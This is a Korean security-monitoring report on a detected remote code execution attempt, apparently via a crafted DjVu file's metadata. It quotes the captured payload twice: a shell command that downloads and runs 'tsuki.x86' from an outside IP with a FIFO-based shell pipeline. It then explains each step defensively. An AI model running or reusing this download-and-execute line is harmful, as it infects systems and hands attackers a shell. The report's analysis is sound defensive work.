[보안관제] 원격코드실행 취약점 공격 시도

공격 설명

원격 코드나 명령 실행(RCE)이 탐지되었습니다.
원격 코드 실행(RCE) 공격은 공격자가 조직의 컴퓨터나 네트워크에서 악성 코드를 실행할 수 있는 공격입니다.
공격자가 제어하는 코드를 실행하는 기능은 추가 맬웨어를 배포하거나 중요한 데이터를 탈취하는 등 다양한 목적으로 사용될 수 있습니다.

 

공격 구문

��>x���
Et$�@1<�*'���x_�^P2�z��F���
�
k


�=4����AT&TFORM�DJVMDIRM.�F���޿� !ȑN��ڈ�k�D,q�I�n����"?FORM^DJVUINFO
dINCLshared_anno.iffBG44J
���7�*�BG44
��BG44
FORMDJVIANTa
P(metadata
(Copyright "\
" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf *.x86; wget http://93.157.106.153/tsuki.x86; curl -O http://93.157.106.153/tsuki.x86; chmod 777 tsuki.x86; ./tsuki.x86 0<$TF | sh 1>$TF} . \ " b ") )

 

공격구문 상세 분석

" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf *.x86; wget http://93.157.106.153/tsuki.x86; curl -O http://93.157.106.153/tsuki.x86; chmod 777 tsuki.x86; ./tsuki.x86 0<$TF | sh 1>$TF} . \ " b ") )

 

• 다운로드 및 실행 명령:
  • wget, curl, chmod, sh 등의 명령어가 포함되어 있습니다. 이러한 명령어는 원격 서버에서 파일을 다운로드하고 실행하는 데 사용됩니다.
  • 이 경우, tsuki.x86라는 파일을 다운로드하고 실행하도록 설계되어 있습니다. 만약 이 파일이 악성 코드라면, 시스템이 감염될 수 있습니다.
• 파일 권한 변경:
  • chmod 777 명령어는 파일의 권한을 변경하여 모든 사용자가 해당 파일을 읽고, 쓰고, 실행할 수 있도록 합니다. 이는 파일을 실행 가능하게 하여 악성 코드가 실행되도록 할 수 있습니다.
• 쉘 파이프라인 사용:
  • mkfifo, sh와 같은 명령을 사용하여 쉘 파이프라인을 설정하고 있습니다. 이는 시스템에서 백그라운드에서 코드를 실행하기 위한 방법으로 사용될 수 있습니다.
• 의심스러운 URL:
  • http://93.157.106.153/tsuki.x86와 같은 URL을 통해 파일을 다운로드하려는 시도가 있습니다. 이는 악성 서버일 가능성이 있으며, 파일이 시스템에 손상을 줄 수 있습니다.

취약점 요약

 

• 원격 코드 실행: 외부에서 명령을 실행하여 시스템에 접근하거나 제어할 수 있는 취약점.
• 악성 파일 다운로드: 악성 파일이 다운로드되고 실행될 수 있는 위험성.
• 쉘 파이프라인 악용: 파이프라인을 통해 백그라운드에서 악성 활동이 이루어질 가능성.